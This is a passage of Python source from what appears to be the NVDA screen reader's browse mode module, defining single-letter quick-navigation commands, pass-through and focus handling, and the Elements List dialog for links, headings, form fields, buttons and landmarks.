# Translators: Reported when single letter navigation in browse mode is turned on.
ui.message(_("Single letter navigation on"))
# Translators: the description for the toggleSingleLetterNavigation command in browse mode.
script_toggleSingleLetterNav.__doc__=_("Toggles single letter navigation on and off. When on, single letter keys in browse mode jump to various kinds of elements on the page. When off, these keys are passed to the application")
def _get_ElementsListDialog(self):
return ElementsListDialog
def _iterNodesByType(self,itemType,direction="next",pos=None):
"""
Yields L{QuickNavItem} objects representing the ordered positions in this document according to the type being searched for (e.g. link, heading, table etc).
@param itemType: the type being searched for (e.g. link, heading, table etc)
@type itemType: string
@param direction: the direction in which to search (next, previous, up)
@type direction: string
@param pos: the position in the document from where to start the search.
@type pos: Usually an L{textInfos.TextInfo}
@raise NotImplementedError: This type is not supported by this BrowseMode implementation
"""
raise NotImplementedError
def _iterNotLinkBlock(self, direction="next", pos=None):
raise NotImplementedError
def _quickNavScript(self,gesture, itemType, direction, errorMessage, readUnit):
if itemType=="notLinkBlock":
iterFactory=self._iterNotLinkBlock
else:
iterFactory=lambda direction,info: self._iterNodesByType(itemType,direction,info)
info=self.selection
try:
item = next(iterFactory(direction, info))
except NotImplementedError:
# Translators: a message when a particular quick nav command is not supported in the current document.
ui.message(_("Not supported in this document"))
return
except StopIteration:
ui.message(errorMessage)
return
# #8831: Report before moving because moving might change the focus, which
# might mutate the document, potentially invalidating info if it is
# offset-based.
if not gesture or not willSayAllResume(gesture):
item.report(readUnit=readUnit)
item.moveTo()
@classmethod
def addQuickNav(
cls,
itemType: str,
key: Optional[str],
nextDoc: str,
nextError: str,
prevDoc: str,
prevError: str,
readUnit: Optional[str] = None
):
"""Adds a script for the given quick nav item.
@param itemType: The type of item, I.E. "heading" "Link" ...
@param key: The quick navigation key to bind to the script.
Shift is automatically added for the previous item gesture. E.G. h for heading.
If C{None} is provided, the script is unbound by default.
@param nextDoc: The command description to bind to the script that yields the next quick nav item.
@param nextError: The error message if there are no more quick nav items of type itemType in this direction.
@param prevDoc: The command description to bind to the script that yields the previous quick nav item.
@param prevError: The error message if there are no more quick nav items of type itemType in this direction.
@param readUnit: The unit (one of the textInfos.UNIT_* constants) to announce when moving to this type of item.
For example, only the line is read when moving to tables to avoid reading a potentially massive table.
If None, the entire item will be announced.
"""
scriptSuffix = itemType[0].upper() + itemType[1:]
scriptName = "next%s" % scriptSuffix
funcName = "script_%s" % scriptName
script = lambda self,gesture: self._quickNavScript(gesture, itemType, "next", nextError, readUnit)
script.__doc__ = nextDoc
script.__name__ = funcName
script.resumeSayAllMode = sayAll.CURSOR.CARET
setattr(cls, funcName, script)
if key is not None:
cls.__gestures["kb:%s" % key] = scriptName
scriptName = "previous%s" % scriptSuffix
funcName = "script_%s" % scriptName
script = lambda self,gesture: self._quickNavScript(gesture, itemType, "previous", prevError, readUnit)
script.__doc__ = prevDoc
script.__name__ = funcName
script.resumeSayAllMode = sayAll.CURSOR.CARET
setattr(cls, funcName, script)
if key is not None:
cls.__gestures["kb:shift+%s" % key] = scriptName
def script_elementsList(self, gesture):
# We need this to be a modal dialog, but it mustn't block this script.
def run():
gui.mainFrame.prePopup()
d = self.ElementsListDialog(self)
d.ShowModal()
d.Destroy()
gui.mainFrame.postPopup()
wx.CallAfter(run)
# Translators: the description for the Elements List command in browse mode.
script_elementsList.__doc__ = _("Lists various types of elements in this document")
script_elementsList.ignoreTreeInterceptorPassThrough = True
def _activateNVDAObject(self, obj):
"""Activate an object in response to a user request.
This should generally perform the default action or click on the object.
@param obj: The object to activate.
@type obj: L{NVDAObjects.NVDAObject}
"""
try:
obj.doAction()
except NotImplementedError:
log.debugWarning("doAction not implemented")
def _activatePosition(self, obj=None):
if not obj:
obj=self.currentNVDAObject
if not obj:
return
if obj.role == controlTypes.Role.MATH:
import mathPres
try:
return mathPres.interactWithMathMl(obj.mathMl)
except (NotImplementedError, LookupError):
pass
return
if self.shouldPassThrough(obj):
obj.setFocus()
self.passThrough = True
reportPassThrough(self)
elif obj.role == controlTypes.Role.EMBEDDEDOBJECT or obj.role in self.APPLICATION_ROLES:
obj.setFocus()
speech.speakObject(obj, reason=OutputReason.FOCUS)
else:
self._activateNVDAObject(obj)
def script_activatePosition(self,gesture):
if config.conf["virtualBuffers"]["autoFocusFocusableElements"]:
self._activatePosition()
else:
self._focusLastFocusableObject(activatePosition=True)
# Translators: the description for the activatePosition script on browseMode documents.
script_activatePosition.__doc__ = _("Activates the current object in the document")
def _focusLastFocusableObject(self, activatePosition=False):
"""Used when auto focus focusable elements is disabled to sync the focus
to the browse mode cursor.
When auto focus focusable elements is disabled, NVDA doesn't focus elements
as the user moves the browse mode cursor. However, there are some cases
where the user always wants to interact with the focus; e.g. if they press
the applications key to open the context menu. In these cases, this method
is called first to sync the focus to the browse mode cursor.
"""
obj = self.currentFocusableNVDAObject
if obj!=self.rootNVDAObject and self._shouldSetFocusToObj(obj) and obj!= api.getFocusObject():
obj.setFocus()
# We might be about to activate or pass through a key which will cause
# this object to change (e.g. checking a check box). However, we won't
# actually get the focus event until after the change has occurred.
# Therefore, we must cache properties for speech before the change occurs.
speech.speakObject(obj, OutputReason.ONLYCACHE)
self._objPendingFocusBeforeActivate = obj
if activatePosition:
# Make sure we activate the object at the caret, which is not necessarily focusable.
self._activatePosition()
def script_passThrough(self,gesture):
if not config.conf["virtualBuffers"]["autoFocusFocusableElements"]:
self._focusLastFocusableObject()
gesture.send()
# Translators: the description for the passThrough script on browseMode documents.
script_passThrough.__doc__ = _("Passes gesture through to the application")
def script_disablePassThrough(self, gesture):
if not self.passThrough or self.disableAutoPassThrough:
return gesture.send()
# #3215 ARIA menus should get the Escape key unconditionally so they can handle it without invoking browse mode first
obj = api.getFocusObject()
if obj and obj.role in self.IGNORE_DISABLE_PASS_THROUGH_WHEN_FOCUSED_ROLES:
return gesture.send()
self.passThrough = False
self.disableAutoPassThrough = False
reportPassThrough(self)
script_disablePassThrough.ignoreTreeInterceptorPassThrough = True
def _set_disableAutoPassThrough(self, state):
# If the user manually switches to focus mode with NVDA+space, that enables
# pass-through and disables auto pass-through. If auto focusing of focusable
# elements is disabled, NVDA won't have synced the focus to the browse mode
# cursor. However, since the user is switching to focus mode, they probably
# want to interact with the focus, so sync the focus here.
if (
state
and not config.conf["virtualBuffers"]["autoFocusFocusableElements"]
and self.passThrough
):
self._focusLastFocusableObject()
self._disableAutoPassThrough = state
def _get_disableAutoPassThrough(self):
return self._disableAutoPassThrough
__gestures={
"kb:NVDA+f7": "elementsList",
"kb:enter": "activatePosition",
"kb:numpadEnter": "activatePosition",
"kb:space": "activatePosition",
"kb:NVDA+shift+space":"toggleSingleLetterNav",
"kb:escape": "disablePassThrough",
"kb:control+enter": "passThrough",
"kb:control+numpadEnter": "passThrough",
"kb:shift+enter": "passThrough",
"kb:shift+numpadEnter": "passThrough",
"kb:control+shift+enter": "passThrough",
"kb:control+shift+numpadEnter": "passThrough",
"kb:alt+enter": "passThrough",
"kb:alt+numpadEnter": "passThrough",
"kb:applications": "passThrough",
"kb:shift+applications": "passThrough",
"kb:shift+f10": "passThrough",
}
# Add quick navigation scripts.
qn = BrowseModeTreeInterceptor.addQuickNav
qn("heading", key="h",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading"))
qn("heading1", key="1",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 1"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 1"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 1"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 1"))
qn("heading2", key="2",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 2"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 2"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 2"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 2"))
qn("heading3", key="3",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 3"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 3"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 3"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 3"))
qn("heading4", key="4",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 4"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 4"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 4"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 4"))
qn("heading5", key="5",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 5"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 5"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 5"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 5"))
qn("heading6", key="6",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next heading at level 6"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next heading at level 6"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous heading at level 6"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous heading at level 6"))
qn("table", key="t",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next table"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next table"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous table"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous table"),
readUnit=textInfos.UNIT_LINE)
qn("link", key="k",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next link"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next link"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous link"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous link"))
qn("visitedLink", key="v",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next visited link"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next visited link"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous visited link"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous visited link"))
qn("unvisitedLink", key="u",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next unvisited link"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next unvisited link"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous unvisited link"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous unvisited link"))
qn("formField", key="f",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next form field"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next form field"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous form field"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous form field"))
qn("list", key="l",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next list"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next list"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous list"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous list"),
readUnit=textInfos.UNIT_LINE)
qn("listItem", key="i",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next list item"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next list item"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous list item"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous list item"))
qn("button", key="b",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next button"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next button"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous button"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous button"))
qn("edit", key="e",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next edit field"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next edit field"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous edit field"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous edit field"),
readUnit=textInfos.UNIT_LINE)
qn("frame", key="m",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next frame"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next frame"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous frame"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous frame"),
readUnit=textInfos.UNIT_LINE)
qn("separator", key="s",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next separator"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next separator"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous separator"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous separator"))
qn("radioButton", key="r",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next radio button"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next radio button"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous radio button"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous radio button"))
qn("comboBox", key="c",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next combo box"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next combo box"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous combo box"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous combo box"))
qn("checkBox", key="x",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next check box"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next check box"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous check box"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous check box"))
qn("graphic", key="g",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next graphic"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next graphic"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous graphic"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous graphic"))
qn("blockQuote", key="q",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next block quote"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next block quote"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous block quote"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous block quote"))
qn("notLinkBlock", key="n",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("skips forward past a block of links"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no more text after a block of links"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("skips backward past a block of links"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no more text before a block of links"),
readUnit=textInfos.UNIT_LINE)
qn("landmark", key="d",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next landmark"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next landmark"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous landmark"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous landmark"),
readUnit=textInfos.UNIT_LINE)
qn("embeddedObject", key="o",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next embedded object"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next embedded object"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous embedded object"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous embedded object"))
qn("annotation", key="a",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next annotation"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next annotation"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous annotation"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous annotation"))
qn("error", key="w",
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next error"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next error"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous error"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous error"))
qn(
"article", key=None,
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next article"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next article"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous article"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous article")
)
qn(
"grouping", key=None,
# Translators: Input help message for a quick navigation command in browse mode.
nextDoc=_("moves to the next grouping"),
# Translators: Message presented when the browse mode element is not found.
nextError=_("no next grouping"),
# Translators: Input help message for a quick navigation command in browse mode.
prevDoc=_("moves to the previous grouping"),
# Translators: Message presented when the browse mode element is not found.
prevError=_("no previous grouping")
)
del qn
class ElementsListDialog(
DpiScalingHelperMixinWithoutInit,
gui.contextHelp.ContextHelpMixin,
wx.Dialog # wxPython does not seem to call base class initializer, put last in MRO
):
helpId = "ElementsList"
ELEMENT_TYPES = (
# Translators: The label of a radio button to select the type of element
# in the browse mode Elements List dialog.
("link", _("Lin&ks")),
# Translators: The label of a radio button to select the type of element
# in the browse mode Elements List dialog.
("heading", _("&Headings")),
# Translators: The label of a radio button to select the type of element
# in the browse mode Elements List dialog.
("formField", _("&Form fields")),
# Translators: The label of a radio button to select the type of element
# in the browse mode Elements List dialog.
("button", _("&Buttons")),
# Translators: The label of a radio button to select the type of element
# in the browse mode Elements List dialog.
("landmark", _("Lan&dmarks")),
)
Element = collections.namedtuple("Element", ("item", "parent"))
lastSelectedElementType=0
def __init__(self, document):
super().__init__(
parent=gui.mainFrame,
# Translators: The title of the browse mode Elements List dialog.
title=_("Elements List")
)
self.document = document
mainSizer = wx.BoxSizer(wx.VERTICAL)
contentsSizer = wx.BoxSizer(wx.VERTICAL)
# Translators: The label of a group of radio buttons to select the type of element
# in the browse mode Elements List dialog.
child = wx.RadioBox(self, wx.ID_ANY, label=_("Type:"), choices=tuple(et[1] for et in self.ELEMENT_TYPES))
child.SetSelection(self.lastSelectedElementType)
child.Bind(wx.EVT_RADIOBOX, self.onElementTypeChange)
contentsSizer.Add(child, flag=wx.EXPAND)
contentsSizer.AddSpacer(gui.guiHelper.SPACE_BETWEEN_VERTICAL_DIALOG_ITEMS)
self.tree = wx.TreeCtrl(
self,
size=self.scaleSize((500, 300)), # height is chosen to ensure the dialog will fit on an 800x600 screen
style=wx.TR_HAS_BUTTONS | wx.TR_HIDE_ROOT | wx.TR_LINES_AT_ROOT | wx.TR_SINGLE | wx.TR_EDIT_LABELS
)
self.tree.Bind(wx.EVT_SET_FOCUS, self.onTreeSetFocus)
self.tree.Bind(wx.EVT_CHAR, self.onTreeChar)
self.tree.Bind(wx.EVT_TREE_BEGIN_LABEL_EDIT, self.onTreeLabelEditBegin)
self.tree.Bind(wx.EVT_TREE_END_LABEL_EDIT, self.onTreeLabelEditEnd)
self.treeRoot = self.tree.AddRoot("root")
contentsSizer.Add(self.tree,flag=wx.EXPAND)
contentsSizer.AddSpacer(gui.guiHelper.SPACE_BETWEEN_VERTICAL_DIALOG_ITEMS)
# Translators: The label of an editable text field to filter the elements
# in the browse mode Elements List dialog.
filterText = _("Filter b&y:")
labeledCtrl = gui.guiHelper.LabeledControlHelper(self, filterText, wx.TextCtrl)
self.filterEdit = labeledCtrl.control
self.filterEdit.Bind(wx.EVT_TEXT, self.onFilterEditTextChange)
contentsSizer.Add(labeledCtrl.sizer)
contentsSizer.AddSpacer(gui.guiHelper.SPACE_BETWEEN_VERTICAL_DIALOG_ITEMS)
bHelper = gui.guiHelper.ButtonHelper(wx.HORIZONTAL)
# Translators: The label of a button to activate an element in the browse mode Elements List dialog.
# Beware not to set an accelerator that would collide with other controls in this dialog, such as an
# element type radio label.
self.activateButton = bHelper.addButton(self, label=_("Activate"))
self.activateButton.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(True))
# Translators: The label of a button to move to an element
# in the browse mode Elements List dialog.
self.moveButton = bHelper.addButton(self, label=_("&Move to"))
self.moveButton.Bind(wx.EVT_BUTTON, lambda evt: self.onAction(False))
bHelper.addButton(self, id=wx.ID_CANCEL)
contentsSizer.Add(bHelper.sizer, flag=wx.ALIGN_RIGHT)
mainSizer.Add(contentsSizer, border=gui.guiHelper.BORDER_FOR_DIALOGS, flag=wx.ALL)
mainSizer.Fit(self)
self.SetSizer(mainSizer)
self.tree.SetFocus()
self.initElementType(self.ELEMENT_TYPES[self.lastSelectedElementType][0])
self.CentreOnScreen()
def onElementTypeChange(self, evt):
elementType=evt.GetInt()
# We need to make sure this gets executed after the focus event.
# Otherwise, NVDA doesn't seem to get the event.
queueHandler.queueFunction(queueHandler.eventQueue, self.initElementType, self.ELEMENT_TYPES[elementType][0])
self.lastSelectedElementType=elementType
def initElementType(self, elType):
if elType in ("link","button"):
# Links and buttons can be activated.
self.activateButton.Enable()
self.SetAffirmativeId(self.activateButton.GetId())
else:
# No other element type can be activated.
self.activateButton.Disable()
self.SetAffirmativeId(self.moveButton.GetId())
# Gather the elements of this type.
self._elements = []
self._initialElement = None
parentElements = []
isAfterSelection=False
for item in self.document._iterNodesByType(elType):
# Find the parent element, if any.
for parent in reversed(parentElements):
if item.isChild(parent.item):
break
else:
# We're not a child of this parent, so this parent has no more children and can be removed from the stack.
parentElements.pop()
else:
# No parent found, so we're at the root.
# Note that parentElements will be empty at this point, as all parents are no longer relevant and have thus been removed from the stack.
parent = None
element=self.Element(item,parent)
self._elements.append(element)
if not isAfterSelection:
isAfterSelection=item.isAfterSelection
if not isAfterSelection:
# The element immediately preceding or overlapping the caret should be the initially selected element.
# Since we have not yet passed the selection, use this as the initial element.
try:
self._initialElement = self._elements[-1]
except IndexError:
# No previous element.
pass
# This could be the parent of a subsequent element, so add it to the parents stack.
parentElements.append(element)
# Start with no filtering.
self.filterEdit.ChangeValue("")
self.filter("", newElementType=True)
def filter(self, filterText, newElementType=False):
# If this is a new element type, use the element nearest the cursor.
# Otherwise, use the currently selected element.
# #8753: wxPython 4 returns "invalid tree item" when the tree view is empty, so use initial element if appropriate.
try:
defaultElement = self._initialElement if newElementType else self.tree.GetItemData(self.tree.GetSelection())
except:
defaultElement = self._initialElement
# Clear the tree.
self.tree.DeleteChildren(self.treeRoot)
# Populate the tree with elements matching the filter text.
elementsToTreeItems = {}
defaultItem = None
matched = False
#Do case-insensitive matching by lowering both filterText and each element's text.
filterText=filterText.lower()
for element in self._elements:
label=element.item.label
if filterText and filterText not in label.lower():
continue
matched = True
parent = element.parent
if parent:
parent = elementsToTreeItems.get(parent)
item = self.tree.AppendItem(parent or self.treeRoot, label)
self.tree.SetItemData(item, element)
elementsToTreeItems[element] = item
if element == defaultElement:
defaultItem = item
self.tree.ExpandAll()
if not matched:
# No items, so disable the buttons.
self.activateButton.Disable()
self.moveButton.Disable()
return
# If there's no default item, use the first item in the tree.
self.tree.SelectItem(defaultItem or self.tree.GetFirstChild(self.treeRoot)[0])
# Enable the button(s).
# If the activate button isn't the default button, it is disabled for this element type and shouldn't be enabled here.
if self.AffirmativeId == self.activateButton.Id:
self.activateButton.Enable()
self.moveButton.Enable()
def onTreeSetFocus(self, evt):
# Start with no search.
self._searchText = ""
self._searchCallLater = None
evt.Skip()
def onTreeChar(self, evt):
key = evt.KeyCode
if key == wx.WXK_RETURN:
# The enter key should be propagated to the dialog and thus activate the default button,
# but this is broken (wx ticket #3725).
# Therefore, we must catch the enter key here.
# Activate the current default button.
evt = wx.CommandEvent(wx.wxEVT_COMMAND_BUTTON_CLICKED, wx.ID_ANY)
button = self.FindWindowById(self.AffirmativeId)
if button.Enabled:
button.ProcessEvent(evt)
else:
wx.Bell()
elif key == wx.WXK_F2:
item=self.tree.GetSelection()
if item:
selectedItemType=self.tree.GetItemData(item).item
self.tree.EditLabel(item)
evt.Skip()
elif key >= wx.WXK_START or key == wx.WXK_BACK:
# Non-printable character.
self._searchText = ""
evt.Skip()
else:
# Search the list.
# We have to implement this ourselves, as tree views don't accept space as a search character.
char = chr(evt.UnicodeKey).lower()
# IF the same character is typed twice, do the same search.
if self._searchText != char:
self._searchText += char
if self._searchCallLater:
self._searchCallLater.Restart()
else:
self._searchCallLater = wx.CallLater(1000, self._clearSearchText)
self.search(self._searchText)
def onTreeLabelEditBegin(self,evt):
item=self.tree.GetSelection()
selectedItemType = self.tree.GetItemData(item).item
if not selectedItemType.isRenameAllowed:
evt.Veto()
def onTreeLabelEditEnd(self,evt):
selectedItemNewName=evt.GetLabel()
item=self.tree.GetSelection()
selectedItemType = self.tree.GetItemData(item).item
selectedItemType.rename(selectedItemNewName)
def _clearSearchText(self):
self._searchText = ""
def search(self, searchText):
item = self.tree.GetSelection()
if not item:
# No items.
return
# First try searching from the current item.
# Failing that, search from the first item.
items = itertools.chain(self._iterReachableTreeItemsFromItem(item), self._iterReachableTreeItemsFromItem(self.tree.GetFirstChild(self.treeRoot)[0]))
if len(searchText) == 1:
# If only a single character has been entered, skip (search after) the current item.
next(items)
for item in items:
if self.tree.GetItemText(item).lower().startswith(searchText):
self.tree.SelectItem(item)
return
# Not found.
wx.Bell()
def _iterReachableTreeItemsFromItem(self, item):
while item:
yield item
childItem = self.tree.GetFirstChild(item)[0]
if childItem and self.tree.IsExpanded(item):
# Has children and is reachable, so recurse.
for childItem in self._iterReachableTreeItemsFromItem(childItem):
yield childItem
item = self.tree.GetNextSibling(item)
def onFilterEditTextChange(self, evt):
self.filter(self.filterEdit.GetValue())
evt.Skip()
def onAction(self, activate):
prevFocus = gui.mainFrame.prevFocus
self.Close()
# Save off the last selected element type on to the class so its used in initialization next time.
self.__class__.lastSelectedElementType=self.lastSelectedElementType
item = self.tree.GetSelection()
item = self.tree.GetItemData(item).item
if activate:
item.activate()
else:
def move():
speech.cancelSpeech()
# Avoid double announce if item.obj is about to gain focus.
if not (
self.document.passThrough
and getattr(item, "obj", False)
and item.obj != prevFocus
and controlTypes.State.FOCUSABLE in item.obj.states
):
# #8831: Report before moving because moving might change the focus, which
# might mutate the document, potentially invalidating info if it is
# offset-based.
item.report()
item.moveTo()
# We must use core.callLater rather than wx.CallLater to ensure that the callback runs within NVDA's core pump.
# If it didn't, and it directly or indirectly called wx.Yield, it could start executing NVDA's core pump from within the yield, causing recursion.
core.callLater(100, move)
class BrowseModeDocumentTextInfo(textInfos.TextInfo):
def _get_focusableNVDAObjectAtStart(self):
try:
item = next(self.obj._iterNodesByType("focusable", "up", self))
except StopIteration:
return self.obj.rootNVDAObject
if not item:
return self.obj.rootNVDAObject
return item.obj
class BrowseModeDocumentTreeInterceptor(documentBase.DocumentWithTableNavigation,cursorManager.CursorManager,BrowseModeTreeInterceptor,treeInterceptorHandler.DocumentTreeInterceptor):
programmaticScrollMayFireEvent = False
def __init__(self,obj):
super(BrowseModeDocumentTreeInterceptor,self).__init__(obj)
self._lastProgrammaticScrollTime = None
self.documentConstantIdentifier = self.documentConstantIdentifier
self._lastFocusObj = None
self._objPendingFocusBeforeActivate = None
self._hadFirstGainFocus = False
self._enteringFromOutside = True
# We need to cache this because it will be unavailable once the document dies.
if not hasattr(self.rootNVDAObject.appModule, "_browseModeRememberedCaretPositions"):
self.rootNVDAObject.appModule._browseModeRememberedCaretPositions = {}
self._lastCaretPosition = None
#: True if the last caret move was due to a focus change.
self._lastCaretMoveWasFocus = False
def terminate(self):
if self.shouldRememberCaretPositionAcrossLoads and self._lastCaretPosition:
try:
self.rootNVDAObject.appModule._browseModeRememberedCaretPositions[self.documentConstantIdentifier] = self._lastCaretPosition
except AttributeError:
# The app module died.
pass
def _get_currentNVDAObject(self):
return self.makeTextInfo(textInfos.POSITION_CARET).NVDAObjectAtStart
def event_treeInterceptor_gainFocus(self):
doSayAll=False
hadFirstGainFocus=self._hadFirstGainFocus
if not hadFirstGainFocus:
# This treeInterceptor is gaining focus for the first time.
# Fake a focus event on the focus object, as the treeInterceptor may have missed the actual focus event.
focus = api.getFocusObject()
self.event_gainFocus(focus, lambda: focus.event_gainFocus())
if not self.passThrough:
# We only set the caret position if in browse mode.
# If in focus mode, the document must have forced the focus somewhere,
# so we don't want to override it.
initialPos = self._getInitialCaretPos()
if initialPos:
self.selection = self.makeTextInfo(initialPos)
reportPassThrough(self)
doSayAll=config.conf['virtualBuffers']['autoSayAllOnPageLoad']
self._hadFirstGainFocus = True
if not self.passThrough:
if doSayAll:
speech.speakObjectProperties(self.rootNVDAObject, name=True, states=True, reason=OutputReason.FOCUS)
sayAll.SayAllHandler.readText(sayAll.CURSOR.CARET)
else:
# Speak it like we would speak focus on any other document object.
# This includes when entering the treeInterceptor for the first time:
if not hadFirstGainFocus:
speech.speakObject(self.rootNVDAObject, reason=OutputReason.FOCUS)
else:
# And when coming in from an outside object
# #4069 But not when coming up from a non-rendered descendant.
ancestors=api.getFocusAncestors()
fdl=api.getFocusDifferenceLevel()
try:
tl=ancestors.index(self.rootNVDAObject)
except ValueError:
tl=len(ancestors)
if fdl<=tl:
